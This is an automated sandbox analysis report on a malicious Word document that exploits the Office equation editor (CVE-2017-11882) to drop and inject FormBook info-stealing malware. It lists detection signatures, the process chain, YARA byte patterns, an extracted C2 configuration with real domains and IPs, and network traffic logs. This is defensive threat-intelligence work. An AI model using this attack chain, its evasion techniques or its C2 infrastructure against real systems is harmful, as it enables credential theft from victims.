Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payment_document.docx.doc

Overview

General Information

Sample Name:Payment_document.docx.doc
Analysis ID:886485
MD5:323d2e404ef99935d376f67fbbf10eda
SHA1:b045a4d259bd2ca912858ea59b6c13153d57ae7a
SHA256:5ed627e700cbe9474dc8077ef6ee3acbb46af4ed3d576da2058ce5e08ff922e7
Tags:doc
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected FormBook malware
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: File Dropped By EQNEDT32EXE
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Allocates memory in foreign processes
Performs DNS queries to domains with low reputation
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Shellcode detected
Office equation editor drops PE file
Contains an external reference to another file
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Sample uses process hollowing technique
Writes to foreign memory regions
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Modifies the prolog of user mode functions (user mode inline hooks)
.NET source code contains method to dynamically call methods (often used by packers)
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Office equation editor establishes network connection
Drops PE files to the user root directory
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Contains functionality to download and execute PE files
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Drops PE files to the user directory
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Searches the installation path of Mozilla Firefox
Enables debug privileges
PE file does not import any functions
Office Equation Editor has been started
Contains functionality to download and launch executables
Potential document exploit detected (performs HTTP gets)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 684 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 3196 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • cleanmgr_settings.exe (PID: 3332 cmdline: "C:\Users\Public\cleanmgr_settings.exe" MD5: CFF6C145EB350EA686F48866937E0A76)
      • RegSvcs.exe (PID: 3388 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regsvcs.exe MD5: 62CE5EF995FD63A1847A196C2E8B267B)
        • explorer.exe (PID: 1860 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • cmmon32.exe (PID: 3440 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: EA7BAAB0792C846DE451001FAE0FBD5F)
            • firefox.exe (PID: 3632 cmdline: C:\Program Files (x86)\Mozilla Firefox\Firefox.exe MD5: C2D924CE9EA2EE3E7B7E6A7C476619CA)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.marineqs.com/hs95/"], "decoy": ["episcopus.biz", "kyinyuanwoaini1.com", "guhut.com", "landslot88.monster", "highefficientwindow.com", "nesainvestments.com", "internettheworldisyours.com", "corruptionapparel.com", "eliteleaderofcharacter.com", "babolcai.sbs", "youreasttennesseerealtor.com", "orbit4dads.com", "jassimple.site", "divasdecorating.com", "chaviaggarwallajababfood.com", "dyj97.com", "cotaarquitectura.store", "geldmaz.com", "ulific.com", "cell-phones-0406-da-sa-fb.xyz", "trenchlessbluebook.net", "jiuse9125.com", "triantsolutions.com", "folado.com", "verticalhoutai.com", "chatsolutionsmail.com", "athleticfoodblog.com", "fancydinnerthisweek.com", "imagesbylester.com", "cheezyknuckles.com", "cardinalprowashllc.com", "renelle.net", "x66618.com", "zbbgwy.com", "biyaheph.online", "nalstudio.net", "theshadowandthelight.media", "songsurvivor.com", "5967uu.com", "faehredaenemark.net", "04ae.top", "web-box.xyz", "cameroonteqball.com", "jistroy.com", "onlinemomboss.com", "hezop.xyz", "bscscan.help", "bareskinaestheticsllc.com", "mrislingo.com", "nebospearlstore.com", "riders-app.store", "www551697.com", "onartistry.net", "lamdalab.site", "trhghfghfgh.com", "h9zpoi11.xyz", "fire-og.com", "nirviacare.com", "wofhistory.com", "expertmediabuyers.com", "online-shopping-52963.bond", "fuhyoofm.com", "178fitness.com", "swwet.site"]}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\wewewewewewewewew##################ewewewewewewe[1].docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0xacd:$obj2: \objdata
  • 0xab7:$obj3: \objupdate
  • 0xa91:$obj5: \objautlink
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\74697CD7.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0xacd:$obj2: \objdata
  • 0xab7:$obj3: \objupdate
  • 0xa91:$obj5: \objautlink

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.1293431078.00000000001F0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000A.00000002.1293431078.00000000001F0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000A.00000002.1293431078.00000000001F0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      0000000A.00000002.1293431078.00000000001F0000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      0000000A.00000002.1293431078.00000000001F0000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18839:$sqlite3step: 68 34 1C 7B E1
      • 0x1894c:$sqlite3step: 68 34 1C 7B E1
      • 0x18868:$sqlite3text: 68 38 2A 90 C5
      • 0x1898d:$sqlite3text: 68 38 2A 90 C5
      • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 29 entries

      Sigma Signatures

      Exploits

      barindex
      Sigma detected: File Dropped By EQNEDT32EXE
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3196, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\cleanmgr[1].exe

      Snort Signatures

      No Snort rule has matched

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus detection for URL or domain
      Source: http://www.hezop.xyz/hs95/www.h9zpoi11.xyzAvira URL Cloud: Label: phishing
      Source: http://www.hezop.xyz/hs95/Avira URL Cloud: Label: phishing
      Antivirus detection for dropped file
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\wewewewewewewewew##################ewewewewewewe[1].docAvira: detection malicious, Label: HEUR/Rtf.Malformed
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\74697CD7.docAvira: detection malicious, Label: HEUR/Rtf.Malformed
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{62062233-A800-4889-8BD5-74F0FF85D95C}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
      Found malware configuration
      Source: 0000000A.00000002.1293431078.00000000001F0000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.marineqs.com/hs95/"], "decoy": ["episcopus.biz", "kyinyuanwoaini1.com", "guhut.com", "landslot88.monster", "highefficientwindow.com", "nesainvestments.com", "internettheworldisyours.com", "corruptionapparel.com", "eliteleaderofcharacter.com", "babolcai.sbs", "youreasttennesseerealtor.com", "orbit4dads.com", "jassimple.site", "divasdecorating.com", "chaviaggarwallajababfood.com", "dyj97.com", "cotaarquitectura.store", "geldmaz.com", "ulific.com", "cell-phones-0406-da-sa-fb.xyz", "trenchlessbluebook.net", "jiuse9125.com", "triantsolutions.com", "folado.com", "verticalhoutai.com", "chatsolutionsmail.com", "athleticfoodblog.com", "fancydinnerthisweek.com", "imagesbylester.com", "cheezyknuckles.com", "cardinalprowashllc.com", "renelle.net", "x66618.com", "zbbgwy.com", "biyaheph.online", "nalstudio.net", "theshadowandthelight.media", "songsurvivor.com", "5967uu.com", "faehredaenemark.net", "04ae.top", "web-box.xyz", "cameroonteqball.com", "jistroy.com", "onlinemomboss.com", "hezop.xyz", "bscscan.help", "bareskinaestheticsllc.com", "mrislingo.com", "nebospearlstore.com", "riders-app.store", "www551697.com", "onartistry.net", "lamdalab.site", "trhghfghfgh.com", "h9zpoi11.xyz", "fire-og.com", "nirviacare.com", "wofhistory.com", "expertmediabuyers.com", "online-shopping-52963.bond", "fuhyoofm.com", "178fitness.com", "swwet.site"]}
      Yara detected FormBook
      Source: Yara matchFile source: 0000000A.00000002.1293431078.00000000001F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.1293276681.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.1114237135.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.1293480956.0000000000220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.1038091182.0000000012B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.1056144185.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Machine Learning detection for dropped file
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\cleanmgr[1].exeJoe Sandbox ML: detected
      Source: C:\Users\Public\cleanmgr_settings.exeJoe Sandbox ML: detected

      Exploits

      barindex
      Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\cleanmgr_settings.exe
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\cleanmgr_settings.exeJump to behavior
      Office equation editor establishes network connection
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 15.223.2.12 Port: 80Jump to behavior
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      Source: unknownHTTPS traffic detected: 103.242.124.88:443 -> 192.168.2.22:49182 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 103.242.124.88:443 -> 192.168.2.22:49183 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 103.242.124.88:443 -> 192.168.2.22:49184 version: TLS 1.0
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: unknownHTTPS traffic detected: 103.242.124.88:443 -> 192.168.2.22:49181 version: TLS 1.2
      Source: Binary string: VECTOR.pdb source: cleanmgr_settings.exe, 00000007.00000002.1034841653.0000000000150000.00000004.08000000.00040000.00000000.sdmp
      Source: Binary string: VECTOR.pdbH source: cleanmgr_settings.exe, 00000007.00000002.1034841653.0000000000150000.00000004.08000000.00040000.00000000.sdmp
      Source: Binary string: cmmon32.pdb source: RegSvcs.exe, 00000008.00000002.1056252554.0000000000270000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1056869423.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 0000000A.00000002.1293719178.0000000000860000.00000040.80000000.00040000.00000000.sdmp
      Source: Binary string: cmmon32.pdbr2v source: RegSvcs.exe, 00000008.00000002.1056252554.0000000000270000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1056869423.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 0000000A.00000002.1293719178.0000000000860000.00000040.80000000.00040000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000003.1035741352.00000000006C0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000003.1034770754.0000000000430000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 0000000A.00000002.1293756599.0000000002120000.00000040.00001000.00020000.00000000.sdmp
      Source: Binary string: JJnnN877.pdb source: cleanmgr_settings.exe
      Source: Binary string: RegSvcs.pdb source: cmmon32.exe, 0000000A.00000002.1293597036.0000000000610000.00000004.00000020.00020000.00000000.sdmp

      Software Vulnerabilities

      barindex
      Shellcode detected
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 5_2_035F064B ShellExecuteW,ExitProcess,5_2_035F064B
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 5_2_035F061D URLDownloadToFileW,ShellExecuteW,ExitProcess,5_2_035F061D
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 5_2_035F05AA LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,5_2_035F05AA
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 5_2_035F05C4 URLDownloadToFileW,ShellExecuteW,ExitProcess,5_2_035F05C4
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 5_2_035F0670 ExitProcess,5_2_035F0670
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 5_2_035F051E URLDownloadToFileW,ShellExecuteW,ExitProcess,5_2_035F051E
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 5_2_035F0636 ShellExecuteW,ExitProcess,5_2_035F0636
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49182
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49182
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49182
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49182
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49182
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49182
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49182
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49182
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49182
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49183
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49183
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49183
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49183
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49183
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49183
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49183
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49183
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49183
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49183
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49183
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49183
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49184
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49184
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49184
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49184
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49184
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49184
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49184
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49184
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49184
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49184
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49184
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49184
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49184
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49184
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49184
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49185
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49185
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49185
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49185
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49185
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49185
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49185
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49185
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49185
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49185
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49185
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49185
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49185
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49185
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49186
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49186
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49186
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49186
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49186
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49186
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49186
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49186
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49186
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49186
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49186
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49186
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49186
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49186
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 103.242.124.88:443 -> 192.168.2.22:49187
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 103.242.124.88:443
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 103.242.124.88:443
